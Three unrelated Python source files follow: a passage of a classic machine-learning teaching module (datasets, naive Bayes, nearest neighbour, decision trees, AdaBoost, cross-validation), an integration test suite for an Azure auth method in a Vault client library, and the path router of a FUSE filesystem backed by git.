If not None, an erroneous value raises ValueError.
d.distance A function from a pair of examples to a nonnegative number.
Should be symmetric, etc. Defaults to mean_boolean_error
since that can handle any field types.
d.name Name of the data set (for output display only).
d.source URL or other source where the data came from.
Normally, you call the constructor and you're done; then you just
access fields like d.examples and d.target and d.inputs."""
def __init__(self, examples=None, attrs=None, attrnames=None, target=-1,
inputs=None, values=None, distance=mean_boolean_error,
name='', source='', exclude=()):
"""Accepts any of DataSet's fields. Examples can also be a
string or file from which to parse examples using parse_csv.
Optional parameter: exclude, as documented in .setproblem().
>>> DataSet(examples='1, 2, 3')
<DataSet(): 1 examples, 3 attributes>
"""
update(self, name=name, source=source,
values=values, distance=distance)
# Initialize .examples from string or list or data directory
if isinstance(examples, str):
self.examples = parse_csv(examples)
elif examples is None:
self.examples = parse_csv(DataFile(name+'.csv').read())
else:
self.examples = examples
# Attrs are the indices of examples, unless otherwise stated.
if not attrs and self.examples:
attrs = list(range(len(self.examples[0])))
self.attrs = attrs
# Initialize .attrnames from string, list, or by default
if isinstance(attrnames, str):
self.attrnames = attrnames.split()
else:
self.attrnames = attrnames or attrs
self.setproblem(target, inputs=inputs, exclude=exclude)
def setproblem(self, target, inputs=None, exclude=()):
"""Set (or change) the target and/or inputs.
This way, one DataSet can be used multiple ways. inputs, if specified,
is a list of attributes, or specify exclude as a list of attributes
to not use in inputs. Attributes can be -n .. n, or an attrname.
Also computes the list of possible values, if that wasn't done yet."""
self.target = self.attrnum(target)
exclude = list(map(self.attrnum, exclude))
if inputs:
self.inputs = removeall(self.target, inputs)
else:
self.inputs = [a for a in self.attrs
if a != self.target and a not in exclude]
if not self.values:
self.values = list(map(unique, list(zip(*self.examples))))
self.check_me()
def check_me(self):
"Check that my fields make sense."
assert len(self.attrnames) == len(self.attrs)
assert self.target in self.attrs
assert self.target not in self.inputs
assert set(self.inputs).issubset(set(self.attrs))
list(map(self.check_example, self.examples))
def add_example(self, example):
"Add an example to the list of examples, checking it first."
self.check_example(example)
self.examples.append(example)
def check_example(self, example):
"Raise ValueError if example has any invalid values."
if self.values:
for a in self.attrs:
if example[a] not in self.values[a]:
raise ValueError('Bad value %s for attribute %s in %s' %
(example[a], self.attrnames[a], example))
def attrnum(self, attr):
"Returns the number used for attr, which can be a name, or -n .. n-1."
if isinstance(attr, str):
return self.attrnames.index(attr)
elif attr < 0:
return len(self.attrs) + attr
else:
return attr
def sanitize(self, example):
"Return a copy of example, with non-input attributes replaced by None."
return [attr_i if i in self.inputs else None
for i, attr_i in enumerate(example)]
def __repr__(self):
return '<DataSet(%s): %d examples, %d attributes>' % (
self.name, len(self.examples), len(self.attrs))
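# A minimal sketch of building a DataSet by hand (made-up numbers), instead of
# loading one of the bundled .csv files:
#
#   weather = DataSet(examples=[[85, 85, 0], [80, 90, 1], [72, 95, 1]],
#                     attrnames='Temp Humidity Play', target='Play')
#   weather.target    # -> 2, the index of the 'Play' attribute
#   weather.inputs    # -> [0, 1]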
#______________________________________________________________________________
def parse_csv(input, delim=','):
r"""Input is a string consisting of lines, each line has comma-delimited
fields. Convert this into a list of lists. Blank lines are skipped.
Fields that look like numbers are converted to numbers.
The delim defaults to ',' but '\t' and None are also reasonable values.
>>> parse_csv('1, 2, 3 \n 0, 2, na')
[[1, 2, 3], [0, 2, 'na']]
"""
lines = [line for line in input.splitlines() if line.strip()]
return [list(map(num_or_str, line.split(delim))) for line in lines]
#______________________________________________________________________________
class CountingProbDist:
"""A probability distribution formed by observing and counting examples.
If p is an instance of this class and o is an observed value, then
there are 3 main operations:
p.add(o) increments the count for observation o by 1.
p.sample() returns a random element from the distribution.
p[o] returns the probability for o (as in a regular ProbDist)."""
def __init__(self, observations=[], default=0):
"""Create a distribution, and optionally add in some observations.
By default this is an unsmoothed distribution, but saying default=1,
for example, gives you add-one smoothing."""
update(self, dictionary={}, n_obs=0.0, default=default, sampler=None)
for o in observations:
self.add(o)
def add(self, o):
"Add an observation o to the distribution."
self.smooth_for(o)
self.dictionary[o] += 1
self.n_obs += 1
self.sampler = None
def smooth_for(self, o):
"""Include o among the possible observations, whether or not
it's been observed yet."""
if o not in self.dictionary:
self.dictionary[o] = self.default
self.n_obs += self.default
self.sampler = None
def __getitem__(self, item):
"Return an estimate of the probability of item."
self.smooth_for(item)
return self.dictionary[item] / self.n_obs
# (top() and sample() are not used in this module, but elsewhere.)
def top(self, n):
"Return (count, obs) tuples for the n most frequent observations."
return heapq.nlargest(n, [(v, k) for (k, v) in list(self.dictionary.items())])
def sample(self):
"Return a random sample from the distribution."
if self.sampler is None:
self.sampler = weighted_sampler(list(self.dictionary.keys()),
list(self.dictionary.values()))
return self.sampler()
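# Usage sketch: an unsmoothed distribution over observed target values.
#
#   p = CountingProbDist(['yes', 'yes', 'no'])
#   p['yes']     # -> 2/3
#   p.add('no')
#   p['no']      # -> 0.5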
#______________________________________________________________________________
def PluralityLearner(dataset):
"""A very dumb algorithm: always pick the result that was most popular
in the training data. Makes a baseline for comparison."""
most_popular = mode([e[dataset.target] for e in dataset.examples])
def predict(example):
"Always return same result: the most popular from the training set."
return most_popular
return predict
#______________________________________________________________________________
def NaiveBayesLearner(dataset):
"""Just count how many times each value of each input attribute
occurs, conditional on the target value. Count the different
target values too."""
targetvals = dataset.values[dataset.target]
target_dist = CountingProbDist(targetvals)
attr_dists = dict(((gv, attr), CountingProbDist(dataset.values[attr]))
for gv in targetvals
for attr in dataset.inputs)
for example in dataset.examples:
targetval = example[dataset.target]
target_dist.add(targetval)
for attr in dataset.inputs:
attr_dists[targetval, attr].add(example[attr])
def predict(example):
"""Predict the target value for example. Consider each possible value,
and pick the most likely by looking at each attribute independently."""
def class_probability(targetval):
return (target_dist[targetval]
* product(attr_dists[targetval, attr][example[attr]]
for attr in dataset.inputs))
return argmax(targetvals, class_probability)
return predict
#______________________________________________________________________________
def NearestNeighborLearner(dataset, k=1):
"k-NearestNeighbor: the k nearest neighbors vote."
def predict(example):
"Find the k closest, and have them vote for the best."
best = heapq.nsmallest(k, ((dataset.distance(e, example), e)
for e in dataset.examples))
return mode(e[dataset.target] for (d, e) in best)
return predict
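# Usage sketch (the 'iris' DataSet is constructed near the end of this module):
#
#   knn = NearestNeighborLearner(iris, k=3)
#   prediction = knn([5.1, 3.0, 1.1, 0.1, None])   # made-up measurement
#
# Note that DataSet.distance defaults to mean_boolean_error, which only checks
# attribute equality, so for numeric data a real metric over the input
# attributes usually gives more sensible neighbours.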
#______________________________________________________________________________
class DecisionFork:
"""A fork of a decision tree holds an attribute to test, and a dict
of branches, one for each of the attribute's values."""
def __init__(self, attr, attrname=None, branches=None):
"Initialize by saying what attribute this node tests."
update(self, attr=attr, attrname=attrname or attr,
branches=branches or {})
def __call__(self, example):
"Given an example, classify it using the attribute and the branches."
attrvalue = example[self.attr]
return self.branches[attrvalue](example)
def add(self, val, subtree):
"Add a branch. If self.attr = val, go to the given subtree."
self.branches[val] = subtree
def display(self, indent=0):
name = self.attrname
print('Test', name)
for (val, subtree) in list(self.branches.items()):
print(' '*4*indent, name, '=', val, '==>', end=' ')
subtree.display(indent+1)
def __repr__(self):
return ('DecisionFork(%r, %r, %r)'
% (self.attr, self.attrname, self.branches))
class DecisionLeaf:
"A leaf of a decision tree holds just a result."
def __init__(self, result):
self.result = result
def __call__(self, example):
return self.result
def display(self, indent=0):
print('RESULT =', self.result)
def __repr__(self):
return repr(self.result)
#______________________________________________________________________________
def DecisionTreeLearner(dataset):
"[Fig. 18.5]"
target, values = dataset.target, dataset.values
def decision_tree_learning(examples, attrs, parent_examples=()):
if len(examples) == 0:
return plurality_value(parent_examples)
elif all_same_class(examples):
return DecisionLeaf(examples[0][target])
elif len(attrs) == 0:
return plurality_value(examples)
else:
A = choose_attribute(attrs, examples)
tree = DecisionFork(A, dataset.attrnames[A])
for (v_k, exs) in split_by(A, examples):
subtree = decision_tree_learning(
exs, removeall(A, attrs), examples)
tree.add(v_k, subtree)
return tree
def plurality_value(examples):
"""Return the most popular target value for this set of examples.
(If target is binary, this is the majority; otherwise plurality.)"""
popular = argmax_random_tie(values[target],
lambda v: count(target, v, examples))
return DecisionLeaf(popular)
def count(attr, val, examples):
return count_if(lambda e: e[attr] == val, examples)
def all_same_class(examples):
"Are all these examples in the same target class?"
class0 = examples[0][target]
return all(e[target] == class0 for e in examples)
def choose_attribute(attrs, examples):
"Choose the attribute with the highest information gain."
return argmax_random_tie(attrs,
lambda a: information_gain(a, examples))
def information_gain(attr, examples):
"Return the expected reduction in entropy from splitting by attr."
def I(examples):
return information_content([count(target, v, examples)
for v in values[target]])
N = float(len(examples))
remainder = sum((len(examples_i) / N) * I(examples_i)
for (v, examples_i) in split_by(attr, examples))
return I(examples) - remainder
def split_by(attr, examples):
"Return a list of (val, examples) pairs for each val of attr."
return [(v, [e for e in examples if e[attr] == v])
for v in values[attr]]
return decision_tree_learning(dataset.examples, dataset.inputs)
def information_content(values):
"Number of bits to represent the probability distribution in values."
probabilities = normalize(removeall(0, values))
return sum(-p * log2(p) for p in probabilities)
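# Worked example: splitting four examples evenly into two classes gives
# information_content([2, 2]) == -(0.5*log2(0.5) + 0.5*log2(0.5)) == 1.0 bit,
# while a pure node gives information_content([4, 0]) == 0.0 (zero counts are
# removed before normalizing).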
#______________________________________________________________________________
# A decision list is implemented as a list of (test, value) pairs.
def DecisionListLearner(dataset):
"""[Fig. 18.11]"""
def decision_list_learning(examples):
if not examples:
return [(True, False)]
t, o, examples_t = find_examples(examples)
if not t:
raise Failure
return [(t, o)] + decision_list_learning(examples - examples_t)
def find_examples(examples):
"""Find a set of examples that all have the same outcome under
some test. Return a tuple of the test, outcome, and examples."""
unimplemented()
def passes(example, test):
"Does the example pass the test?"
unimplemented()
def predict(example):
"Predict the outcome for the first passing test."
for test, outcome in predict.decision_list:
if passes(example, test):
return outcome
predict.decision_list = decision_list_learning(set(dataset.examples))
return predict
#______________________________________________________________________________
def NeuralNetLearner(dataset, sizes):
"""Layered feed-forward network."""
activations = [[0.0 for i in range(n)] for n in sizes]
weights = []
def predict(example):
unimplemented()
return predict
class NNUnit:
"""Unit of a neural net."""
def __init__(self):
unimplemented()
def PerceptronLearner(dataset, sizes):
def predict(example):
return sum([])
unimplemented()
#______________________________________________________________________________
def Linearlearner(dataset):
"""Fit a linear model to the data."""
unimplemented()
#______________________________________________________________________________
def EnsembleLearner(learners):
"""Given a list of learning algorithms, have them vote."""
def train(dataset):
predictors = [learner(dataset) for learner in learners]
def predict(example):
return mode(predictor(example) for predictor in predictors)
return predict
return train
#______________________________________________________________________________
def AdaBoost(L, K):
"""[Fig. 18.34]"""
def train(dataset):
examples, target = dataset.examples, dataset.target
N = len(examples)
epsilon = 1./(2*N)
w = [1./N] * N
h, z = [], []
for k in range(K):
h_k = L(dataset, w)
h.append(h_k)
error = sum(weight for example, weight in zip(examples, w)
if example[target] != h_k(example))
# Avoid divide-by-0 from either 0% or 100% error rates:
error = clip(error, epsilon, 1-epsilon)
for j, example in enumerate(examples):
if example[target] == h_k(example):
w[j] *= error / (1. - error)
w = normalize(w)
z.append(math.log((1. - error) / error))
return WeightedMajority(h, z)
return train
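# Usage sketch: AdaBoost expects a *weighted* learner, so wrap an unweighted
# one with WeightedLearner (defined below) before boosting:
#
#   boosted = AdaBoost(WeightedLearner(PluralityLearner), K=5)
#   predictor = boosted(restaurant)   # the 'restaurant' DataSet is defined below
#   predictor(restaurant.examples[0])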
def WeightedMajority(predictors, weights):
"Return a predictor that takes a weighted vote."
def predict(example):
return weighted_mode((predictor(example) for predictor in predictors),
weights)
return predict
def weighted_mode(values, weights):
"""Return the value with the greatest total weight.
>>> weighted_mode('abbaa', [1,2,3,1,2])
'b'"""
totals = defaultdict(int)
for v, w in zip(values, weights):
totals[v] += w
return max(list(totals.keys()), key=totals.get)
#_____________________________________________________________________________
# Adapting an unweighted learner for AdaBoost
def WeightedLearner(unweighted_learner):
"""Given a learner that takes just an unweighted dataset, return
one that takes also a weight for each example. [p. 749 footnote 14]"""
def train(dataset, weights):
return unweighted_learner(replicated_dataset(dataset, weights))
return train
def replicated_dataset(dataset, weights, n=None):
"Copy dataset, replicating each example in proportion to its weight."
n = n or len(dataset.examples)
result = copy.copy(dataset)
result.examples = weighted_replicate(dataset.examples, weights, n)
return result
def weighted_replicate(seq, weights, n):
"""Return n selections from seq, with the count of each element of
seq proportional to the corresponding weight (filling in fractions
randomly).
>>> weighted_replicate('ABC', [1,2,1], 4)
['A', 'B', 'B', 'C']"""
assert len(seq) == len(weights)
weights = normalize(weights)
wholes = [int(w*n) for w in weights]
fractions = [(w*n) % 1 for w in weights]
return (flatten([x] * nx for x, nx in zip(seq, wholes))
+ weighted_sample_with_replacement(seq, fractions, n - sum(wholes)))
def flatten(seqs): return sum(seqs, [])
#_____________________________________________________________________________
# Functions for testing learners on examples
def test(predict, dataset, examples=None, verbose=0):
"Return the proportion of the examples that are correctly predicted."
if examples is None:
examples = dataset.examples
if len(examples) == 0:
return 0.0
right = 0.0
for example in examples:
desired = example[dataset.target]
output = predict(dataset.sanitize(example))
if output == desired:
right += 1
if verbose >= 2:
print(' OK: got %s for %s' % (desired, example))
elif verbose:
print('WRONG: got %s, expected %s for %s' % (
output, desired, example))
return right / len(examples)
def train_and_test(learner, dataset, start, end):
"""Reserve dataset.examples[start:end] for test; train on the remainder.
Return the proportion of examples correct on the test examples."""
examples = dataset.examples
try:
dataset.examples = examples[:start] + examples[end:]
return test(learner(dataset), dataset, examples[start:end])
finally:
dataset.examples = examples
def cross_validation(learner, dataset, k=10, trials=1):
"""Do k-fold cross_validate and return their mean.
That is, keep out 1/k of the examples for testing on each of k runs.
Shuffle the examples first; If trials>1, average over several shuffles."""
if k is None:
k = len(dataset.examples)
if trials > 1:
return mean([cross_validation(learner, dataset, k, trials=1)
for t in range(trials)])
else:
n = len(dataset.examples)
random.shuffle(dataset.examples)
        return mean([train_and_test(learner, dataset, i * (n // k), (i + 1) * (n // k))
                     for i in range(k)])
def leave1out(learner, dataset):
"Leave one out cross-validation over the dataset."
return cross_validation(learner, dataset, k=len(dataset.examples))
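# Usage sketch: estimate a learner's accuracy with the helpers above.
#
#   cross_validation(NaiveBayesLearner, iris, k=10)   # proportion correct, in [0, 1]
#   leave1out(PluralityLearner, zoo)                  # leave-one-out variant
#
# (The 'iris' and 'zoo' DataSets are loaded from csv files further down.)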
def learningcurve(learner, dataset, trials=10, sizes=None):
if sizes is None:
sizes = list(range(2, len(dataset.examples)-10, 2))
def score(learner, size):
random.shuffle(dataset.examples)
return train_and_test(learner, dataset, 0, size)
return [(size, mean([score(learner, size) for t in range(trials)]))
for size in sizes]
#______________________________________________________________________________
# The rest of this file gives datasets for machine learning problems.
orings = DataSet(name='orings', target='Distressed',
attrnames="Rings Distressed Temp Pressure Flightnum")
zoo = DataSet(name='zoo', target='type', exclude=['name'],
attrnames="name hair feathers eggs milk airborne aquatic " +
"predator toothed backbone breathes venomous fins legs tail " +
"domestic catsize type")
iris = DataSet(name="iris", target="class",
attrnames="sepal-len sepal-width petal-len petal-width class")
#______________________________________________________________________________
# The Restaurant example from Fig. 18.2
def RestaurantDataSet(examples=None):
"Build a DataSet of Restaurant waiting examples. [Fig. 18.3]"
return DataSet(name='restaurant', target='Wait', examples=examples,
attrnames='Alternate Bar Fri/Sat Hungry Patrons Price '
+ 'Raining Reservation Type WaitEstimate Wait')
restaurant = RestaurantDataSet()
def T(attrname, branches):
branches = dict((value, (child if isinstance(child, DecisionFork)
else DecisionLeaf(child)))
for value, child in list(branches.items()))
return DecisionFork(restaurant.attrnum(attrname), attrname, branches)
Fig[18, 2] = T('Patrons',
{'None': 'No', 'Some': 'Yes', 'Full':
T('WaitEstimate',
{'>60': 'No', '0-10': 'Yes',
'30-60':
T('Alternate', {'No':
T('Reservation', {'Yes': 'Yes', 'No':
T('Bar', {'No': 'No',
'Yes': 'Yes'})}),
'Yes':
T('Fri/Sat', {'No': 'No', 'Yes': 'Yes'})}),
'10-30':
T('Hungry', {'No': 'Yes', 'Yes':
T('Alternate',
{'No': 'Yes', 'Yes':
T('Raining', {'No': 'No', 'Yes': 'Yes'})})})})})
__doc__ += """
[Fig. 18.6]
>>> random.seed(437)
>>> restaurant_tree = DecisionTreeLearner(restaurant)
>>> restaurant_tree.display()
Test Patrons
Patrons = None ==> RESULT = No
Patrons = Full ==> Test Hungry
Hungry = Yes ==> Test Type
Type = Burger ==> RESULT = Yes
Type = Thai ==> Test Fri/Sat
Fri/Sat = Yes ==> RESULT = Yes
Fri/Sat = No ==> RESULT = No
Type = French ==> RESULT = Yes
Type = Italian ==> RESULT = No
Hungry = No ==> RESULT = No
Patrons = Some ==> RESULT = Yes
"""
def SyntheticRestaurant(n=20):
"Generate a DataSet with n examples."
def gen():
example = list(map(random.choice, restaurant.values))
example[restaurant.target] = Fig[18, 2](example)
return example
return RestaurantDataSet([gen() for i in range(n)])
#______________________________________________________________________________
# Artificial, generated datasets.
def Majority(k, n):
"""Return a DataSet with n k-bit examples of the majority problem:
k random bits followed by a 1 if more than half the bits are 1, else 0."""
examples = []
for i in range(n):
bits = [random.choice([0, 1]) for i in range(k)]
bits.append(int(sum(bits) > k/2))
examples.append(bits)
return DataSet(name="majority", examples=examples)
def Parity(k, n, name="parity"):
"""Return a DataSet with n k-bit examples of the parity problem:
k random bits followed by a 1 if an odd number of bits are 1, else 0."""
examples = []
for i in range(n):
bits = [random.choice([0, 1]) for i in range(k)]
bits.append(sum(bits) % 2)
examples.append(bits)
return DataSet(name=name, examples=examples)
def Xor(n):
"""Return a DataSet with n examples of 2-input xor."""
return Parity(2, n, name="xor")
def ContinuousXor(n):
"2 inputs are chosen uniformly from (0.0 .. 2.0]; output is xor of ints."
examples = []
for i in range(n):
x, y = [random.uniform(0.0, 2.0) for i in '12']
examples.append([x, y, int(x) != int(y)])
return DataSet(name="continuous xor", examples=examples)
#______________________________________________________________________________
def compare(algorithms=[PluralityLearner, NaiveBayesLearner,
NearestNeighborLearner, DecisionTreeLearner],
datasets=[iris, orings, zoo, restaurant, SyntheticRestaurant(20),
Majority(7, 100), Parity(7, 100), Xor(100)],
k=10, trials=1):
"""Compare various learners on various datasets using cross-validation.
Print results as a table."""
print_table([[a.__name__.replace('Learner', '')] +
[cross_validation(a, d, k, trials) for d in datasets]
for a in algorithms],
header=[''] + [d.name[0:7] for d in datasets], numfmt='%.2f')
|
|
import logging
from unittest import TestCase
from unittest import skipIf
from parameterized import parameterized, param
from hvac import exceptions
from tests import utils
from tests.utils.hvac_integration_test_case import HvacIntegrationTestCase
@skipIf(
utils.vault_version_lt("0.10.0"),
"Azure auth method not available before Vault version 0.10.0",
)
class TestAzure(HvacIntegrationTestCase, TestCase):
TEST_MOUNT_POINT = "azure-test"
def setUp(self):
super(TestAzure, self).setUp()
if "%s/" % self.TEST_MOUNT_POINT not in self.client.sys.list_auth_methods():
self.client.sys.enable_auth_method(
method_type="azure",
path=self.TEST_MOUNT_POINT,
)
def tearDown(self):
super(TestAzure, self).tearDown()
self.client.sys.disable_auth_method(
path=self.TEST_MOUNT_POINT,
)
@parameterized.expand(
[
param(
"tenant_id and resource",
),
param(
"client id and secret",
client_id="my-client-id",
client_secret="my-client-secert",
),
param(
"invalid environment",
environment="AzurePublicCats",
raises=exceptions.ParamValidationError,
exception_message="invalid environment argument provided",
),
]
)
def test_configure(
self,
label,
client_id=None,
client_secret=None,
environment="AzurePublicCloud",
raises=None,
exception_message="",
):
tenant_id = "my-tenant-id"
resource = "my-resource"
if raises:
with self.assertRaises(raises) as cm:
self.client.auth.azure.configure(
tenant_id=tenant_id,
resource=resource,
client_id=client_id,
client_secret=client_secret,
environment=environment,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
configure_response = self.client.auth.azure.configure(
tenant_id=tenant_id,
resource=resource,
client_id=client_id,
client_secret=client_secret,
environment=environment,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("configure_response: %s" % configure_response)
self.assertEqual(
first=bool(configure_response),
second=True,
)
@parameterized.expand(
[
param(
"success",
),
param(
"no config written yet",
write_config_first=False,
raises=exceptions.InvalidPath,
),
]
)
def test_read_config(self, label, write_config_first=True, raises=None):
expected_config = {
"tenant_id": "my-tenant-id",
"resource": "my-resource",
}
if write_config_first:
self.client.auth.azure.configure(
mount_point=self.TEST_MOUNT_POINT, **expected_config
)
if raises is not None:
with self.assertRaises(raises):
self.client.auth.azure.read_config(
mount_point=self.TEST_MOUNT_POINT,
)
else:
read_config_response = self.client.auth.azure.read_config(
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("read_config_response: %s" % read_config_response)
for k, v in expected_config.items():
self.assertEqual(
first=v,
second=read_config_response[k],
)
@parameterized.expand(
[
("success",),
]
)
def test_delete_config(self, label):
delete_config_response = self.client.auth.azure.delete_config(
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("delete_config_response: %s" % delete_config_response)
self.assertEqual(
first=bool(delete_config_response),
second=True,
)
@parameterized.expand(
[
param(
"success",
bound_service_principal_ids=["my-sp-id"],
),
param(
"CSV policies arg",
bound_service_principal_ids=["my-sp-id"],
policies="cats,dogs",
),
param(
"list policies arg",
bound_service_principal_ids=["my-sp-id"],
policies=["cats", "dogs"],
),
param(
"no bound constraints",
raises=exceptions.InvalidRequest,
exception_message="must have at least one bound constraint when creating/updating a role",
),
param(
"wrong policy arg type",
bound_service_principal_ids=["my-sp-id"],
policies={"dict": "bad"},
raises=exceptions.ParamValidationError,
exception_message="unsupported policies argument provided",
),
param(
"mixed policy arg type",
bound_service_principal_ids=["my-sp-id"],
policies=["cats", "dogs", None, 42],
raises=exceptions.ParamValidationError,
exception_message="unsupported policies argument provided",
),
]
)
def test_create_role(
self,
label,
policies=None,
bound_service_principal_ids=None,
raises=None,
exception_message="",
):
if raises:
with self.assertRaises(raises) as cm:
self.client.auth.azure.create_role(
name="my-role",
policies=policies,
bound_service_principal_ids=bound_service_principal_ids,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
create_role_response = self.client.auth.azure.create_role(
name="my-role",
policies=policies,
bound_service_principal_ids=bound_service_principal_ids,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("create_role_response: %s" % create_role_response)
self.assertEqual(
first=bool(create_role_response),
second=True,
)
@parameterized.expand(
[
param(
"success",
),
param(
"nonexistent role name",
configure_role_first=False,
raises=exceptions.InvalidPath,
),
]
)
def test_read_role(
self,
label,
role_name="hvac",
configure_role_first=True,
raises=None,
exception_message="",
):
bound_service_principal_ids = ["some-dummy-sp-id"]
if configure_role_first:
create_role_response = self.client.auth.azure.create_role(
name=role_name,
bound_service_principal_ids=bound_service_principal_ids,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("create_role_response: %s" % create_role_response)
if raises is not None:
with self.assertRaises(raises):
self.client.auth.azure.read_role(
name=role_name,
mount_point=self.TEST_MOUNT_POINT,
)
else:
read_role_response = self.client.auth.azure.read_role(
name=role_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("read_role_response: %s" % read_role_response)
self.assertEqual(
first=read_role_response["bound_service_principal_ids"],
second=bound_service_principal_ids,
)
@parameterized.expand(
[
param(
"success",
),
param(
"no roles",
num_roles_to_create=0,
raises=exceptions.InvalidPath,
),
param(
"no config",
write_config_first=False,
),
]
)
def test_list_roles(
self, label, num_roles_to_create=1, write_config_first=True, raises=None
):
if write_config_first:
self.client.auth.azure.configure(
tenant_id="my-tenant-id",
resource="my-resource",
mount_point=self.TEST_MOUNT_POINT,
)
roles_to_create = ["hvac%s" % n for n in range(0, num_roles_to_create)]
bound_service_principal_ids = ["some-dummy-sp-id"]
logging.debug("roles_to_create: %s" % roles_to_create)
for role_to_create in roles_to_create:
create_role_response = self.client.auth.azure.create_role(
name=role_to_create,
bound_service_principal_ids=bound_service_principal_ids,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("create_role_response: %s" % create_role_response)
if raises is not None:
with self.assertRaises(raises):
self.client.auth.azure.list_roles(
mount_point=self.TEST_MOUNT_POINT,
)
else:
list_roles_response = self.client.auth.azure.list_roles(
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("read_role_response: %s" % list_roles_response)
self.assertEqual(
first=list_roles_response["keys"],
second=roles_to_create,
)
@parameterized.expand(
[
param(
"success",
),
param(
"nonexistent role name",
configure_role_first=False,
),
]
)
def test_delete_role(self, label, configure_role_first=True, raises=None):
role_name = "hvac"
bound_service_principal_ids = ["some-dummy-sp-id"]
if configure_role_first:
create_role_response = self.client.auth.azure.create_role(
name=role_name,
bound_service_principal_ids=bound_service_principal_ids,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("create_role_response: %s" % create_role_response)
if raises is not None:
with self.assertRaises(raises):
self.client.auth.azure.delete_role(
name=role_name,
mount_point=self.TEST_MOUNT_POINT,
)
else:
delete_role_response = self.client.auth.azure.delete_role(
name=role_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("delete_role_response: %s" % delete_role_response)
self.assertEqual(
first=bool(delete_role_response),
second=True,
)
|
|
# Copyright 2014-2016 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import os
import time
import shutil
import inspect
from pwd import getpwnam
from grp import getgrnam
from errno import ENOSYS
from fuse import FUSE, FuseOSError
from gitfs.repository import Repository
from gitfs.cache import CachedIgnore, lru_cache
from gitfs.events import shutting_down, fetch, idle
from gitfs.log import log
class Router(object):
def __init__(
self,
remote_url,
repo_path,
mount_path,
credentials,
current_path="current",
history_path="history",
branch=None,
user="root",
group="root",
**kwargs
):
"""
Clone repo from a remote into repo_path/<repo_name> and checkout to
a specific branch.
:param str remote_url: URL of the repository to clone
        :param str repo_path: Where all the repos are cloned
:param str branch: Branch to checkout after the
clone. The default is to use the remote's default branch.
"""
self.remote_url = remote_url
self.repo_path = repo_path
self.mount_path = mount_path
self.current_path = current_path
self.history_path = history_path
self.branch = branch
self.routes = []
log.info("Cloning into {}".format(self.repo_path))
self.repo = Repository.clone(
self.remote_url, self.repo_path, self.branch, credentials
)
log.info("Done cloning")
self.repo.credentials = credentials
submodules = os.path.join(self.repo_path, ".gitmodules")
ignore = os.path.join(self.repo_path, ".gitignore")
self.repo.ignore = CachedIgnore(
submodules=submodules,
ignore=ignore,
exclude=kwargs["ignore_file"] or None,
hard_ignore=kwargs["hard_ignore"],
)
self.uid = getpwnam(user).pw_uid
self.gid = getgrnam(group).gr_gid
self.commit_queue = kwargs["commit_queue"]
self.mount_time = int(time.time())
self.max_size = kwargs["max_size"]
self.max_offset = kwargs["max_offset"]
self.repo.commits.update()
self.workers = []
def init(self, path):
for worker in self.workers:
worker.start()
log.debug("Done init")
def destroy(self, path):
log.debug("Stopping workers")
shutting_down.set()
fetch.set()
for worker in self.workers:
worker.join()
log.debug("Workers stopped")
shutil.rmtree(self.repo_path)
log.info("Successfully umounted %s", self.mount_path)
def __call__(self, operation, *args):
"""
Magic method which calls a specific method from a view.
        In the FUSE API, almost every method receives a path argument. Based on
        that path we can route each call to a specific view. For example, if a
        method is called with a path argument like `/current/dir1/dir2/file1`,
        we need to find the view that knows how to handle this path,
        instantiate it and then call our method on the newly created
        object.
:param str operation: Method name to be called
:param args: tuple containing the arguments to be transmitted to
the method
:rtype: function
"""
if operation in ["destroy", "init"]:
view = self
else:
path = args[0]
view, relative_path = self.get_view(path)
args = (relative_path,) + args[1:]
log.debug("Call %s %s with %r" % (operation, view.__class__.__name__, args))
if not hasattr(view, operation):
log.debug("No attribute %s on %s" % (operation, view.__class__.__name__))
raise FuseOSError(ENOSYS)
idle.clear()
return getattr(view, operation)(*args)
def register(self, routes):
for regex, view in routes:
log.debug("Registering %s for %s", view, regex)
self.routes.append({"regex": regex, "view": view})
def get_view(self, path):
"""
Try to map a given path to its specific view.
If a match is found, a view object is created with the right regex
groups (named or unnamed).
:param str path: path to be matched
:rtype: view object, relative path
"""
for route in self.routes:
result = re.search(route["regex"], path)
if result is None:
continue
groups = result.groups()
relative_path = re.sub(route["regex"], "", path)
relative_path = "/" if not relative_path else relative_path
cache_key = result.group(0)
log.debug("Router: Cache key for %s: %s", path, cache_key)
view = lru_cache.get_if_exists(cache_key)
if view is not None:
log.debug("Router: Serving %s from cache", path)
return view, relative_path
kwargs = result.groupdict()
# TODO: move all this to a nice config variable
kwargs["repo"] = self.repo
kwargs["ignore"] = self.repo.ignore
kwargs["repo_path"] = self.repo_path
kwargs["mount_path"] = self.mount_path
kwargs["regex"] = route["regex"]
kwargs["relative_path"] = relative_path
kwargs["current_path"] = self.current_path
kwargs["history_path"] = self.history_path
kwargs["uid"] = self.uid
kwargs["gid"] = self.gid
kwargs["branch"] = self.branch
kwargs["mount_time"] = self.mount_time
kwargs["queue"] = self.commit_queue
kwargs["max_size"] = self.max_size
kwargs["max_offset"] = self.max_offset
args = set(groups) - set(kwargs.values())
view = route["view"](*args, **kwargs)
lru_cache[cache_key] = view
log.debug("Router: Added %s to cache", path)
return view, relative_path
raise ValueError("Found no view for '{}'".format(path))
def __getattr__(self, attr_name):
"""
It will only be called by the `__init__` method from `fuse.FUSE` to
establish which operations will be allowed after mounting the
filesystem.
"""
methods = inspect.getmembers(FUSE, predicate=callable)
fuse_allowed_methods = set(elem[0] for elem in methods)
return attr_name in fuse_allowed_methods - set(["bmap", "lock"])
